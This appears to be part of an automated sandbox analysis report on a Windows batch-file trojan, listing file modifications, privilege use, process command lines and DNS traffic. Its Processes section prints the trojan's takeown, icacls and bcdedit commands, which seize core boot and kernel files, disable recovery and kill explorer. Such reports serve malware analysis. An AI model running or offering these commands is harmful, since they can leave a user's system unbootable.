| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\models\EMAIL~1.MOD | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID5E5~1.0_X\Assets\CONTRA~1\AppList.targetsize-32_altform-unplated_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MICROS~1.SCA\Assets\AppTiles\STOREL~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\adalrt.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIE908~1.SCA\Assets\AppTiles\CONTRA~1\MAPSAP~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI32BC~1.0_X\STANDA~2.CSO | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MIA289~1.SCA\Assets\InsiderHubMedTile.scale-125.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID5E5~1.0_X\Assets\CONTRA~2\AppList.targetsize-64_contrast-white.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\images\CONTRA~1\ON6557~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIAA44~1.0_X\Assets\AppTiles\StoreBadgeLogo.scale-200.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MICROS~4.0_X\Assets\CONTRA~2\APBB2D~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\images\CONTRA~1\ONBE52~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI46F3~1.0_X\MICROS~1.WIN | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI4E99~1.0_X\Assets\WINDOW~1\WIBCE2~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIE997~1.0_X\Assets\GA6DCE~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI92C9~1.0_X\Assets\BAB1D2~1.JPG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\images\CONTRA~1\ON8F1E~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIF104~1.0_X\Assets\AL1673~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI83BA~1.0_X\Assets\Retail\RETAIL~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI2B2D~1.0_X\APPXMA~1.XML | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID483~1.0_X\APPXME~1\CODEIN~1.CAT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIBE99~1.0_X\Assets\ACHIEV~1.MP3 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIE908~1.SCA\Assets\AppTiles\CONTRA~2\MAPSWI~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI46F3~1.0_X\Assets\Fonts\PPLMDL~1.TTF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIA705~1.SCA\RESOUR~1.PRI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\EX438A~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MIBBCB~1.SCA\Assets\AppTiles\LibrarySquare150x150Logo.scale-100.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI33D2~1.0_X\rtmpal.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MID374~1.SCA\Assets\GamesXboxHubStoreLogo.scale-125.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI6132~1.0_X\Assets\AppList.targetsize-48_altform-unplated.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI6132~1.0_X\Assets\CONTRA~1\STOREL~2.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\HxA-GoogleCloudCacheMini.scale-150.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI83BA~1.0_X\Assets\INA134~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIAA44~1.0_X\STOREP~1.WIN | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIB28C~1.0_X\Assets\CONTRA~2\AppList.targetsize-16_contrast-white.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIB28C~1.0_X\DECODE~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI33D2~1.0_X\REACTA~1\assets\RNApp\app\uwp\images\pstn\PSTN_P~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI67C7~1.0_X\Assets\SC7806~1.PNG | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.bat"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\hal.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\hal.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ci.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ci.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\winload.efi"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\winload.efi" /grant everyone:F
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\WindowsApps"
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\WindowsApps" /grant everyone:F
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1416,i,15316930299780304231,7592852768794498680,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |